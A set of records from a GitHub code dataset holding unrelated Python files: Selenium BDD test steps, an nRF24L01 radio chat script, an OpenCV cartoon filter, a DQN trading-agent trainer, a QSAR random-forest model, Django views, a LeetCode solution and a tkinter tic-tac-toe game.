\"{Servicio}\"')\ndef step_impl(context, Agenda, organismo, Servicio):\n try:\n AgendaPage.FiltrarXComponenetesAgenda(context, Agenda, organismo, Servicio)\n except:\n context.driver.close()\n assert False, \"La prueba fallo en: Filtrar por nombre agenda, organismo y servicio\"\n\n\n@when(u'Click en Configurar Registro Agenda')\ndef step_impl(context):\n try:\n AgendaPage.ConfiguracionAgenda(context)\n except:\n context.driver.close()\n assert False, \"La prueba fallo en: Click en Configurar Registro Agenda\"\n\n\n@when(u'Seleccionar Dias de agenda')\ndef step_impl(context):\n try:\n AgendaPage.SeleccionarDias(context)\n except:\n context.driver.close()\n assert False, \"La prueba fallo en: Seleccionar Dias de agenda\"\n\n\n@when(u'Ingresar Duracion turno y confirmacion \"{duracionTurno}\"')\ndef step_impl(context, duracionTurno):\n try:\n AgendaPage.IngresarYConfirmarDuracionTurno(context, duracionTurno)\n except:\n context.driver.close()\n assert False, \"La prueba fallo en: Ingresar Duracion turno y confirmacion\"\n\n\n@when(u'Ingresar Fechas vigencia desde y hasta')\ndef step_impl(context):\n try:\n AgendaPage.FechasDesdeYHasta(context)\n except:\n context.driver.close()\n assert False, \"La prueba fallo en: Ingresar Fechas vigencia desde y hasta\"\n\n\n@when(u'Agregar franja horaria')\ndef step_impl(context):\n try:\n AgendaPage.AgregarFranjaHoraria(context)\n except:\n context.driver.close()\n assert False, \"La prueba fallo en: Agregar franja horaria\"\n\n\n@when(u'Ingresar horario 1er turno y ultimo turno \"{primerTurno}\" \"{ultimoTurno}\"')\ndef step_impl(context, primerTurno, ultimoTurno):\n try:\n AgendaPage.IngresarPrimerYUltimoTurno(context, primerTurno, ultimoTurno)\n except:\n context.driver.close()\n assert False, \"La prueba fallo en: Ingresar horario 1er turno y ultimo turno\"\n\n\n@when(u'Ingresar cantidad de turnos en simultaneo \"{turnosSimultaneos}\"')\ndef step_impl(context, turnosSimultaneos):\n try:\n AgendaPage.TurnosSimultaneos(context, turnosSimultaneos)\n except:\n context.driver.close()\n assert False, \"La prueba fallo en: Ingresar cantidad de turnos en simultaneo\"\n\n\n@when(u'Click en Aceptar y Guardar configuracion de agenda')\ndef step_impl(context):\n try:\n AgendaPage.AceptarYGuardar(context)\n except:\n context.driver.close()\n assert False, \"La prueba fallo en: Validar Alta correcta de configuracion Agenda\"\n\n\n@then(u'Validar Alta correcta de configuracion Agenda')\ndef step_impl(context):\n try:\n AgendaPage.ValidateToastAltaConfiguracionAGENDA(context)\n time.sleep(2)\n context.driver.close()\n except:\n context.driver.close()\n assert False, \"La prueba fallo en: Validar Alta correcta de configuracion Agenda\"\n\n\n\n","repo_name":"MarcosIannello/AutomationBDD_Python_selenium","sub_path":"TestAutomation/features/steps/ConfiguracionAgenda.py","file_name":"ConfiguracionAgenda.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1119565869","text":"import threading\nfrom ghostprotocol import nrf24l01,portChecker\nfrom time import sleep\n\n# Port Selection\nport = portChecker()\nnodeId = input(\"nodeId >> \")\n\n# Creating the nrf24l01 object\nnrf = nrf24l01(port,nodeId,237415,\"AX45-S\") # Creating object nrf24l01\nnrf.moduleInit()\nprint(nrf.cardSpec) # See the properties of the object\n\n# Setting transmitter side\ndef transmitter():\n while True:\n dataToTX = input()\n if dataToTX[:10] == \"/send_file\":\n fileName = dataToTX.split(\" 
\",1)[1]\n s,f,t = nrf.fileTX(fileName).values()\n #print(f\"Total Success : {nrf.totalCorrectTransmissions} | Total Failed {nrf.totalIncorrectTransmissions} | Success : {s} | Failed {f} | Time Elapsed : {t}\")\n else :\n s,f,t = nrf.msgTX(dataToTX).values()\n #print(f\"Total Success : {nrf.totalCorrectTransmissions} | Total Failed {nrf.totalIncorrectTransmissions} | Success : {s} | Failed {f} | Time Elapsed : {t}\")\n\n# Setting receiver side1\ndef receiver():\n while True:\n msg = nrf.rx()\n if msg != None:\n try:\n node, data = msg[\"node\"], msg[\"data\"]\n print(f\"{node} >> {data}\")\n except: pass\n sleep(0.01)\n\nt1 = threading.Thread(target=transmitter)\nt2 = threading.Thread(target=receiver)\n\nt1.start()\nt2.start()","repo_name":"x3beche/GhostProtocol","sub_path":"sourceCode/v2 - current version/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16357716467","text":"import cv2 \r\nimport numpy as np\r\n#imports the edge detector from previous part as well as the median filter files\r\nfrom EdgeCartoon import Edge_Dectection_func\r\nfrom MedianCartoon import filterset\r\nif __name__ == '__main__': \r\n #Reads input image\r\n input_image = cv2.imread('mandrill.png',1)\r\n output_image = input_image .copy()\r\n\r\n\r\ndef CartoonFilter(in_img):\r\n new_img = np.copy(in_img)\r\n #sends the input image through the edge detector imported from the previous part to get highlighted edges\r\n edge_img = Edge_Dectection_func(new_img)\r\n #Sends the input image through the series of median filters imported from previous part\r\n median_img = filterset(new_img)\r\n #loops through the entire range of the image\r\n for i in range(in_img.shape[0]):\r\n for j in range(in_img.shape[1]):\r\n #If the loop encounters 0 intensity (non edges), the median filtered image is used\r\n if edge_img[i,j][0] ==0 and edge_img[i,j][1]==0 and edge_img[i,j][2]==0 :\r\n new_img[i,j] = median_img[i,j] \r\n #Else, the intensity is made black or 0 intensity\r\n else:\r\n new_img[i,j] = 0\r\n #returns the cartoonie image \r\n return new_img\r\nif __name__ == '__main__': \r\n #Calls upon CartoonFilter function\r\n output_image = CartoonFilter(input_image)\r\n cv2.imshow('Cartoonie',output_image)\r\n cv2.imwrite('Snowy_cartoon.jpg',output_image)\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\r\n","repo_name":"dvrbic/Cartoon-Effect-Filter","sub_path":"CartoonCombined/CartoonCombined/CartoonCombined.py","file_name":"CartoonCombined.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70044253289","text":"from RecordCandle import ReadCandles\nfrom Lob import ReadLobs\nfrom Env import QRLEnv\nfrom Model import DQN\n\nimport torch\nimport gym\nimport os\nimport ptan\n\nimport torch.nn as nn\nimport torch.optim as optim\nimport sys\nimport time\nimport numpy as np\n\nDEFAULT_EVENT_COUNT = 100\nDEFAULT_TRADE_COUNT = 10\nDEFAULT_CANDLE_COUNT = 10\nDEFAULT_LOB_NUM_LEVEL = 10\nDEFAULT_EVENT_WIDTH = 7\nDEFAULT_TRADE_WIDTH = 5\nDEFAULT_CANDLE_WIDTH = 4\nDEFAULT_AP_WIDTH = 5\nDEFAULT_SUPRES_WIDTH = 6\nDEFAULT_ACTION_N = 5\n\nBATCH_SIZE = 32\nBARS_COUNT = 500\nTARGET_NET_SYNC = 1000\n\nGAMMA = 0.99\n\nREPLAY_SIZE = 100000\nREPLAY_INITIAL = 10000\n\nREWARD_STEPS = 1\n\nLEARNING_RATE = 0.0001\n\nSTATES_TO_EVALUATE = 1000\nEVAL_EVERY_STEP = 1000\n\nEPSILON_START = 1.0\nEPSILON_STOP = 0.1\nEPSILON_STEPS = 
1000000\n\nCHECKPOINT_EVERY_STEP = 100000\nVALIDATION_EVERY_STEP = 100000\n\n\nclass RewardTracker:\n def __init__(self, stop_reward, group_rewards=1):\n self.stop_reward = stop_reward\n self.reward_buf = []\n self.steps_buf = []\n self.group_rewards = group_rewards\n\n def __enter__(self):\n self.ts = time.time()\n self.ts_frame = 0\n self.total_rewards = []\n self.total_steps = []\n return self\n\n def __exit__(self, *args):\n pass\n\n def reward(self, reward_steps, frame, epsilon=None):\n reward, steps = reward_steps\n self.reward_buf.append(reward)\n self.steps_buf.append(steps)\n if len(self.reward_buf) < self.group_rewards:\n return False\n reward = np.mean(self.reward_buf)\n steps = np.mean(self.steps_buf)\n self.reward_buf.clear()\n self.steps_buf.clear()\n self.total_rewards.append(reward)\n self.total_steps.append(steps)\n speed = (frame - self.ts_frame) / (time.time() - self.ts)\n self.ts_frame = frame\n self.ts = time.time()\n mean_reward = np.mean(self.total_rewards[-100:])\n mean_steps = np.mean(self.total_steps[-100:])\n epsilon_str = \"\" if epsilon is None else \", eps %.2f\" % epsilon\n print(\"%d: done %d games, mean reward %.3f, mean steps %.2f, speed %.2f f/s%s\" % (\n frame, len(self.total_rewards)*self.group_rewards, mean_reward, mean_steps, speed, epsilon_str\n ))\n sys.stdout.flush()\n\n if mean_reward > self.stop_reward:\n print(\"Solved in %d frames!\" % frame)\n return True\n return False\n\n\ndef calc_values_of_states(states, net, device=\"cpu\"):\n mean_vals = []\n for batch in np.array_split(states, 64):\n states_v = torch.tensor(batch).to(device)\n action_values_v = net(states_v)\n best_action_values_v = action_values_v.max(1)[0]\n mean_vals.append(best_action_values_v.mean().item())\n return np.mean(mean_vals)\n\n\ndef unpack_batch(batch):\n states, actions, rewards, dones, last_states = [], [], [], [], []\n for exp in batch:\n state = np.array(exp.state, copy=False)\n states.append(state)\n actions.append(exp.action)\n rewards.append(exp.reward)\n dones.append(exp.last_state is None)\n if exp.last_state is None:\n last_states.append(state) # the result will be masked anyway\n else:\n last_states.append(np.array(exp.last_state, copy=False))\n return np.array(states, copy=False), np.array(actions), np.array(rewards, dtype=np.float32), \\\n np.array(dones, dtype=np.uint8), np.array(last_states, copy=False)\n\n\ndef calc_loss(batch, net, tgt_net, gamma, device=\"cpu\"):\n states, actions, rewards, dones, next_states = unpack_batch(batch)\n\n states_v = torch.tensor(states).to(device)\n next_states_v = torch.tensor(next_states).to(device)\n actions_v = torch.tensor(actions).to(device)\n rewards_v = torch.tensor(rewards).to(device)\n done_mask = torch.ByteTensor(dones).to(device)\n\n state_action_values = net(states_v).gather(1, actions_v.unsqueeze(-1)).squeeze(-1)\n next_state_actions = net(next_states_v).max(1)[1]\n next_state_values = tgt_net(next_states_v).gather(1, next_state_actions.unsqueeze(-1)).squeeze(-1)\n next_state_values[done_mask] = 0.0\n\n expected_state_action_values = next_state_values.detach() * gamma + rewards_v\n return nn.MSELoss()(state_action_values, expected_state_action_values)\n\n\n# initialize networks\nif True:\n cuda = True\n run = 'qrl'\n device = torch.device(\"cuda\" if cuda else \"cpu\")\n \n saves_path = os.path.join(\"/home/user/QRLDumps\", run)\n os.makedirs(saves_path, exist_ok=True)\n\n # read big array\n lob_order, lobs = ReadLobs('lob.txt')\n candles15min_order, candles15min = ReadCandles('min15.txt')\n candles1min_order, 
candles1min = ReadCandles('min1.txt')\n candles1sec_order, candles1sec = ReadCandles('sec1.txt')\n\n # find 4h point after start and 15 min point before end of data\n lob_order_len = len(lob_order)\n start_time = lob_order[0]\n ind = 0\n cur_time = lob_order[ind]\n diff = 4 * 60 * 60 * 1000 # 4 hours in ms\n \n while ((cur_time - start_time) < diff):\n ind += 1\n cur_time = lob_order[ind]\n \n start_random_time = ind\n \n # find 1h point before end of data\n end_time = lob_order[lob_order_len - 1]\n ind = (lob_order_len - 1)\n cur_time = lob_order[ind]\n diff = 60 * 60 * 1000 # 1h im ms\n \n while ((end_time - cur_time) < diff):\n ind -= 1\n cur_time = lob_order[ind]\n \n end_random_time = ind \n \n env = QRLEnv(lob_order, lobs, candles15min_order, candles15min, candles1min_order, candles1min, candles1sec_order, candles1sec, start_random_time, end_random_time, DEFAULT_EVENT_COUNT, DEFAULT_TRADE_COUNT, DEFAULT_CANDLE_COUNT)\n env.reset() \n env = gym.wrappers.TimeLimit(env, max_episode_steps=1000) \n\n print(env.observation_space.shape)\n print(env.action_space.n)\n \n net = DQN(DEFAULT_LOB_NUM_LEVEL, DEFAULT_EVENT_COUNT, DEFAULT_EVENT_WIDTH, DEFAULT_CANDLE_COUNT, DEFAULT_CANDLE_WIDTH, \n DEFAULT_TRADE_COUNT, DEFAULT_TRADE_WIDTH, DEFAULT_AP_WIDTH, DEFAULT_SUPRES_WIDTH, DEFAULT_ACTION_N).to(device)\n\n tgt_net = ptan.agent.TargetNet(net)\n selector = ptan.actions.EpsilonGreedyActionSelector(EPSILON_START)\n agent = ptan.agent.DQNAgent(net, selector, device=device)\n exp_source = ptan.experience.ExperienceSourceFirstLast(env, agent, GAMMA, steps_count=REWARD_STEPS)\n buffer = ptan.experience.ExperienceReplayBuffer(exp_source, REPLAY_SIZE)\n optimizer = optim.Adam(net.parameters(), lr=LEARNING_RATE)\n \n # main training loop\n step_idx = 0\n eval_states = None\n best_mean_val = None\n \n \n# do the main learning loop \nif True:\n with RewardTracker(np.inf, group_rewards=100) as reward_tracker:\n while True:\n step_idx += 1\n buffer.populate(1)\n selector.epsilon = max(EPSILON_STOP, EPSILON_START - step_idx / EPSILON_STEPS)\n\n new_rewards = exp_source.pop_rewards_steps()\n if new_rewards:\n val = reward_tracker.reward(new_rewards[0], step_idx, selector.epsilon)\n if val:\n break\n\n if len(buffer) < REPLAY_INITIAL:\n continue\n\n if eval_states is None:\n print(\"Initial buffer populated, start training\")\n eval_states = buffer.sample(STATES_TO_EVALUATE)\n eval_states = [np.array(transition.state, copy=False) for transition in eval_states]\n eval_states = np.array(eval_states, copy=False)\n\n if step_idx % EVAL_EVERY_STEP == 0:\n mean_val = calc_values_of_states(eval_states, net, device=device)\n #writer.add_scalar(\"values_mean\", mean_val, step_idx)\n if best_mean_val is None or best_mean_val < mean_val:\n if best_mean_val is not None:\n print(\"%d: Best mean value updated %.3f -> %.3f\" % (step_idx, best_mean_val, mean_val))\n best_mean_val = mean_val \n\n optimizer.zero_grad()\n batch = buffer.sample(BATCH_SIZE)\n loss_v = calc_loss(batch, net, tgt_net.target_model, GAMMA ** REWARD_STEPS, device=device)\n loss_v.backward()\n optimizer.step()\n\n if step_idx % TARGET_NET_SYNC == 0:\n tgt_net.sync()\n\n if step_idx % CHECKPOINT_EVERY_STEP == 0:\n idx = step_idx // CHECKPOINT_EVERY_STEP\n torch.save(net.state_dict(), os.path.join(saves_path, \"checkpoint-%3d.data\" % idx)) \n \n \n\n\n\n \n\n\n \n \n \n \n 
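# A minimal sketch (editor's illustration, not from the original script) of\n# the exploration schedule the loop above applies each frame via\n#     selector.epsilon = max(EPSILON_STOP, EPSILON_START - step_idx / EPSILON_STEPS)\n# It assumes only the EPSILON_* constants defined near the top of this file;\n# the helper name _epsilon_at is hypothetical.\ndef _epsilon_at(step_idx, start=EPSILON_START, stop=EPSILON_STOP, steps=EPSILON_STEPS):\n    # Decay linearly from start down to stop over steps frames, then stay flat.\n    return max(stop, start - step_idx / steps)\n\nassert _epsilon_at(0) == EPSILON_START  # full exploration at frame 0\nassert _epsilon_at(EPSILON_STEPS // 2) == 0.5  # halfway through the anneal\nassert _epsilon_at(2 * EPSILON_STEPS) == EPSILON_STOP  # clamped once annealed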
\n\n","repo_name":"akirnasov/Quantum-RL","sub_path":"mainQRL.py","file_name":"mainQRL.py","file_ext":"py","file_size_in_byte":8601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30632968120","text":"import pandas as pd\r\nimport numpy as np\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nfrom sklearn.feature_selection import VarianceThreshold\r\n\r\n\r\n\"\"\"\r\nLoad the dataset\r\n\"\"\"\r\npath = \"https://github.com/dataprofessor/data/raw/master/acetylcholinesterase_06_bioactivity_data_3class_pIC50_pubchem_fp.csv\"\r\n\r\ndf = pd.read_csv(path)\r\n# print(df.head())\r\n\r\n\"\"\"\r\nDefine Input features\r\n\r\nThe dataset contains 307 input features\r\nand 1 output variable (pIC50).\r\nRemember to drop the 'Name' variable\r\n\"\"\"\r\ndrop_variable = 'pIC50'\r\nX = df.drop(drop_variable, axis=1)\r\n\r\n# convert all values in all columns of the new X\r\n# dataframe to type 'float'\r\n# X = X.astype(float)\r\n\r\n# print(X.head())\r\n\r\n\"\"\"\r\nOutput features\r\n\"\"\"\r\ny = df.pIC50\r\n# print(y.head())\r\n\r\n\"\"\"\r\nExamine data dimensions\r\n\"\"\"\r\ndef data_dimensions():\r\n print(X.shape)\r\n print(y.shape)\r\n\r\n# data_dimensions()\r\n\r\n\"\"\"\r\nRemove low variance features\r\n\r\nOnly 12 features would be left!\r\n# \"\"\"\r\nselection = VarianceThreshold(\r\n threshold=(.8 * (1 - .8)))\r\nX = selection.fit_transform(X)\r\n# print(X.shape) # 12 features left\r\n\r\n\"\"\"\r\nData split (80/20 ratio)\r\n\"\"\"\r\nX_train, X_test, y_train, y_test = train_test_split(\r\n X, y, test_size=0.2)\r\n\r\ndef train_test_data_shapes():\r\n print(f\"X_train.shape, y_train.shape = {X_train.shape}, {y_train.shape}\")\r\n print(f\"X_test.shape, y_test.shape = {X_test.shape}, {y_test.shape}\")\r\n\r\n# train_test_data_shapes()\r\n\r\n\"\"\"\r\nBuilding a Regression Model using \r\nRandom Forest regressor algorithm\r\n\"\"\"\r\nnp.random.seed(100)\r\nmodel = RandomForestRegressor(n_estimators=100)\r\nmodel.fit(X_train, y_train)\r\nr2 = model.score(X_test, y_test)\r\n# print(r2)\r\n\r\n\"\"\"\r\nGet all predicted values\r\n\"\"\"\r\nY_pred = model.predict(X_test)\r\n\r\n\"\"\"\r\nScatter Plot of Experimental vs Predicted \r\npIC50 Values\r\n\"\"\"\r\ndef scatter_last():\r\n sns.set(color_codes=True)\r\n sns.set_style(\"white\")\r\n\r\n ax = sns.regplot(y_test, Y_pred,\r\n scatter_kws={'alpha':0.4})\r\n ax.set_xlabel('Experimental pIC50',\r\n fontsize='large', fontweight='bold')\r\n ax.set_ylabel('Predicted pIC50',\r\n fontsize='large', fontweight='bold')\r\n ax.set_xlim(0, 12)\r\n ax.set_ylim(0, 12)\r\n ax.figure.set_size_inches(5, 5)\r\n plt.show()\r\n\r\n# scatter_last()\r\n","repo_name":"Enowtakang/qsar1","sub_path":"7 RF regression model.py","file_name":"7 RF regression model.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30061383429","text":"a = [1,2,5,6,3,5,2,8,8,8,5,5,5,2,8]\n\ndic = {}\n\nfor i in a:\n count = 0\n for j in a :\n if i == j:\n count = count+1\n dic[i] = count \n\nmax = 0\nfor i in dic.values():\n if i>max:\n max = i\n\nfor key , value in dic.items():\n if value == max:\n print(key)\n 
\n","repo_name":"Krupal01/python_programs","sub_path":"majority_element.py","file_name":"majority_element.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29816461623","text":"import glob\nimport os\n\ntemplate_for_store = \"\"\"\n\t{\n\t\tparsed: false,\n\t\tsource: {\n\t\t\ttype: 'audio',\n\t\t\ttype:'static',\n\t\t\tsources: [\n\t\t\t\t{\n\t\t\t\t\tsrc: '/||filename||',\n\t\t\t\t\ttype: 'audio/mp3'\n\t\t\t\t}\n\t\t\t]\n\t\t}\n\t},\n\"\"\"\n\nfor file in glob.glob(f\"static{os.path.sep}*.mp3\"):\n f = file.split(os.path.sep)[-1]\n print(template_for_store.replace(\"||filename||\", f))","repo_name":"DevParapalli/music-manager","sub_path":"src-helpers/create_store_listing.py","file_name":"create_store_listing.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8062708733","text":"from django.views.generic import TemplateView\nfrom django.views.generic.base import RedirectView\nfrom django.contrib.auth.mixins import UserPassesTestMixin\nfrom django.utils.translation import LANGUAGE_SESSION_KEY\n\nfrom stories.models import Story\nfrom alerts.models import Alert\n\n\nclass CommonContextMixin(object):\n \"\"\"This mixin makes the email of the logged in user available as\n a template tag. It is responsible for the email to appear in the\n rightmost part of the navbar\n \"\"\"\n\n def get_context_data(self, **kwargs):\n\n context = super(CommonContextMixin, self).get_context_data(**kwargs)\n\n if self.request.user.is_authenticated:\n user = self.request.user\n context[\"email\"] = user.email\n\n return context\n\n\nclass SessionMixin(object):\n\n def track_stories_from_session_data(self, user):\n story_id = self.request.session.get(\"wants_to_track\", None)\n\n if story_id is not None:\n try:\n story = Story.objects.get(id = story_id)\n try:\n Alert.objects.get(story = story, user = user)\n # inform the user that he is already subscribed\n # to this story\n except Alert.DoesNotExist:\n new_alert = Alert(story = story, user = user)\n new_alert.save()\n except Story.DoesNotExist:\n pass\n self.request.session[\"wants_to_track\"] = None\n\n\nclass HomeView(CommonContextMixin, SessionMixin, TemplateView):\n\n template_name = \"home.html\"\n\n def get_context_data(self, **kwargs):\n\n context = super(HomeView, self).get_context_data(**kwargs)\n\n if self.request.user.is_authenticated:\n user = self.request.user\n if user.is_publisher:\n self.template_name = \"publisher_home.html\"\n else:\n self.template_name = \"reader_home.html\"\n\n #If the reader logs in after visiting a landing page, then\n #this line ensures that he automatically starts tracking the\n #story upon login.\n self.track_stories_from_session_data(user)\n\n alerts = Alert.objects.filter(user = user)\n alerts_sorted_by_unread = sorted(\n alerts, key = lambda item: -item.unread_count()\n )\n\n context[\"object_list\"] = alerts_sorted_by_unread\n\n return context\n\n\nclass ChangeLanguageView(RedirectView):\n\n def get_redirect_url(self):\n language = self.request.GET.get(\"language\", None)\n redirect_url = self.request.GET.get(\"next\", None)\n\n if language is not None:\n self.request.session[LANGUAGE_SESSION_KEY] = language\n\n if redirect_url is None:\n redirect_url = \"/\"\n\n return 
redirect_url\n","repo_name":"gutfeeling/storybeep","sub_path":"storybeep_backend/storybeep_backend/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38131738509","text":"import bisect\nimport collections\nimport copy\nimport functools\nimport math\nfrom typing import List, Optional\nfrom collections import defaultdict\nfrom util import TreeNode, lc_tree2list, lc_list2tree\n\n\n# Definition for a Node.\nclass Node:\n def __init__(self, x: int, next: 'Node' = None, random: 'Node' = None):\n self.val = int(x)\n self.next = next\n self.random = random\n\n\nclass Solution:\n def copyRandomList(self, head: 'Node') -> 'Node':\n if not head:\n return None\n mem_new = dict()\n mem_old = dict()\n hd = head\n rtn = cur = Node(head.val)\n idx = 0\n while head.next:\n mem_new[idx] = cur\n mem_old[head] = idx\n cur.next = Node(head.next.val)\n head = head.next\n cur = cur.next\n idx += 1\n mem_new[idx] = cur\n mem_old[head] = idx\n cur = rtn\n while hd:\n cur.random = mem_new[mem_old[hd.random]] if hd.random else None\n hd = hd.next\n cur = cur.next\n return rtn\n\n\nif __name__ == \"__main__\":\n sol = Solution()\n # test_cases = [\n # [2,2,3,2],\n # [0,1,0,1,0,1,99]\n # ]\n # for i in test_cases:\n # print(sol.singleNumber(i))\n","repo_name":"chyt123/cosmos","sub_path":"coding_everyday/lc101-200/lc138/Copy List with Random Pointer.py","file_name":"Copy List with Random Pointer.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21123869235","text":"\"\"\"\nSimple tic tac toe game made with the tkinter GUI toolkit\nEnables the players to choose their displayed names, keep track of the score count and reset the game.\n\nMade by David Santos - https://github.com/odavidsons/tictactoe-GUI-python\n\"\"\"\n\nimport tkinter as tk\nfrom time import sleep\n\nclass App(tk.Frame):\n\n board = [\n ['-','-','-'],\n ['-','-','-'],\n ['-','-','-'],\n ]\n player1 = \"\"\n player2 = \"\"\n turn = player1\n shape = \"\"\n\n def __init__(self, master=None):\n tk.Frame.__init__(self, master)\n self.config(width=75,padx=20,pady=20)\n self.pack()\n \n def renderBoard(self):\n gameBoard = tk.Frame(self,width=40,pady=15)\n gameBoard.pack()\n tile1 = tk.Button(gameBoard,width=5,height=5,text=self.board[0][0],command=lambda x=0, y=0: self.drawShape(x,y,tile1))\n tile1.grid(row=0,column=0)\n tile2 = tk.Button(gameBoard,width=5,height=5,text=self.board[0][1],command=lambda x=0, y=1: self.drawShape(x,y,tile2))\n tile2.grid(row=0,column=1)\n tile3 = tk.Button(gameBoard,width=5,height=5,text=self.board[0][2],command=lambda x=0, y=2: self.drawShape(x,y,tile3))\n tile3.grid(row=0,column=2)\n\n tile4 = tk.Button(gameBoard,width=5,height=5,text=self.board[1][0],command=lambda x=1, y=0: self.drawShape(x,y,tile4))\n tile4.grid(row=1,column=0)\n tile5 = tk.Button(gameBoard,width=5,height=5,text=self.board[1][1],command=lambda x=1, y=1: self.drawShape(x,y,tile5))\n tile5.grid(row=1,column=1)\n tile6 = tk.Button(gameBoard,width=5,height=5,text=self.board[1][2],command=lambda x=1, y=2: self.drawShape(x,y,tile6))\n tile6.grid(row=1,column=2)\n\n tile7 = tk.Button(gameBoard,width=5,height=5,text=self.board[2][0],command=lambda x=2, y=0: self.drawShape(x,y,tile7))\n tile7.grid(row=2,column=0)\n tile8 = tk.Button(gameBoard,width=5,height=5,text=self.board[2][1],command=lambda x=2, y=1: 
self.drawShape(x,y,tile8))\n        tile8.grid(row=2,column=1)\n        tile9 = tk.Button(gameBoard,width=5,height=5,text=self.board[2][2],command=lambda x=2, y=2: self.drawShape(x,y,tile9))\n        tile9.grid(row=2,column=2)\n\n    #Draw a player shape on the board. It receives the position and the button that was pressed to be able to update its text\n    #Also checks if there is a winner when a shape is drawn\n    def drawShape(self,row,col,buttonUpdate):\n        #The player names are stored as module-level globals by inputPlayers(),\n        #so check those here (the class attributes are never updated)\n        if globals().get(\"player1\") and globals().get(\"player2\"):\n            current_player = self.turn\n            if self.board[row][col] == \"-\":\n                self.board[row][col]= self.playerTurn()\n                buttonUpdate.config(text=self.board[row][col])\n\n                #Check if there is a winner\n                if self.checkWin(self.shape) == True:\n                    print(\"Player: \"+current_player+\" wins!\")\n                    self.addScore(current_player)\n                    labelTurn.config(text=\"Player \"+current_player+\" wins!\")\n                    self.clearBoard()\n                else:\n                    #Check if the board is filled, and call a draw\n                    if self.checkFilledBoard() == True:\n                        print(\"It's a draw!\")\n                        labelTurn.config(text=\"It's a draw!\")\n                        self.clearBoard()\n        else:\n            print(\"Please enter the player names!\")\n            labelTurn.config(text=\"Please enter the player names!\")\n\n    def addScore(self,winner):\n        #cget returns the label text as a string, so convert it before incrementing\n        if winner == player1:\n            scoreP1.config(text=int(scoreP1.cget(\"text\"))+1)\n        else: scoreP2.config(text=int(scoreP2.cget(\"text\"))+1)\n\n    #Reset the game board\n    def clearBoard(self):\n        sleep(1)\n        for row in self.board:\n            for i in range(len(row)):\n                row[i] = \"-\"\n        #Get all the widgets in the main window that are buttons, and set their text back to default\n        widgets = self.nametowidget(\"!frame\").winfo_children()\n        for widget in widgets:\n            #winfo_name is a method, so it has to be called to get the widget name\n            widget_name = widget.winfo_name()\n            if widget_name.find(\"button\") != -1 and widget_name.find(\"button10\") == -1:\n                widget.config(text=\"-\")\n\n    #Reset the game\n    def resetGame(self):\n        self.clearBoard()\n        scoreP1.config(text=0)\n        scoreP2.config(text=0)\n        self.turn = globals().get(\"player1\", \"\")\n        labelTurn.config(text=\"Turn: \"+self.turn)\n\n    #Swap player turns\n    def playerTurn(self):\n\n        if self.turn == player1:\n            self.turn = player2\n            labelTurn.config(text=\"Turn: \"+player2)\n            self.shape = \"X\"\n            return \"X\"\n        else:\n            labelTurn.config(text=\"Turn: \"+player1)\n            self.turn = player1\n            self.shape = \"O\"\n            return \"O\"\n\n    #Verify if there is a winner in the current turn\n    def checkWin(self,shape):\n        win = False\n        if self.board[0][0] == self.board[0][1] == self.board[0][2] == shape: #horizontal 1\n            win = True\n        elif self.board[1][0] == self.board[1][1] == self.board[1][2] == shape: #horizontal 2\n            win = True\n        elif self.board[2][0] == self.board[2][1] == self.board[2][2] == shape: #horizontal 3\n            win = True\n        elif self.board[0][0] == self.board[1][0] == self.board[2][0] == shape: #vertical 1\n            win = True\n        elif self.board[0][1] == self.board[1][1] == self.board[2][1] == shape: #vertical 2\n            win = True\n        elif self.board[0][2] == self.board[1][2] == self.board[2][2] == shape: #vertical 3\n            win = True\n        elif self.board[0][0] == self.board[1][1] == self.board[2][2] == shape: #diagonal 1\n            win = True\n        elif self.board[0][2] == self.board[1][1] == self.board[2][0] == shape: #diagonal 2\n            win = True\n        return win\n\n    #Check if the board has been filled\n    def checkFilledBoard(self):\n        filled = True\n        for i in range(len(self.board)):\n            for l in range(len(self.board)):\n                if self.board[i][l] == \"-\": filled = False\n        return filled\n\n    def inputNamesWindow(self):\n        global inputForm,input1,input2\n\n        #Create the window for inputting the player names\n        inputForm = tk.Toplevel()\n        inputForm.title(\"Enter names\")\n        label1 = 
tk.Label(text=\"Player 1: \",master=inputForm)\n label1.grid(row=0,column=0)\n input1 = tk.Entry(master=inputForm)\n input1.grid(row=0,column=1)\n label2 = tk.Label(text=\"Player 2: \",master=inputForm)\n label2.grid(row=1,column=0)\n input2= tk.Entry(master=inputForm)\n input2.grid(row=1,column=1)\n button1 = tk.Button(inputForm,text=\"OK\",command=lambda: self.inputPlayers(input1.get(),input2.get()))\n button1.grid(row=2,column=0,columnspan=2)\n inputForm.attributes('-topmost', True)\n \n #Set the player name variables with the inputs\n def inputPlayers(self,input1,input2):\n global player1,player2\n\n player1 = input1\n labelP1.config(text=player1+\": X\")\n player2 = input2\n labelP2.config(text=player2+\": O\")\n inputForm.destroy()\n self.playerTurn()\n\n#Run application\ngame = App()\ngame.master.title('Tic Tac Toe')\nlabelTurn = tk.Label(game,text=\"Turn\")\nlabelTurn.pack()\n\ngame.renderBoard()\n\ngameInfo = tk.Frame(game)\ngameInfo.pack(fill=\"x\")\n#Display player names\nscoreFrame = 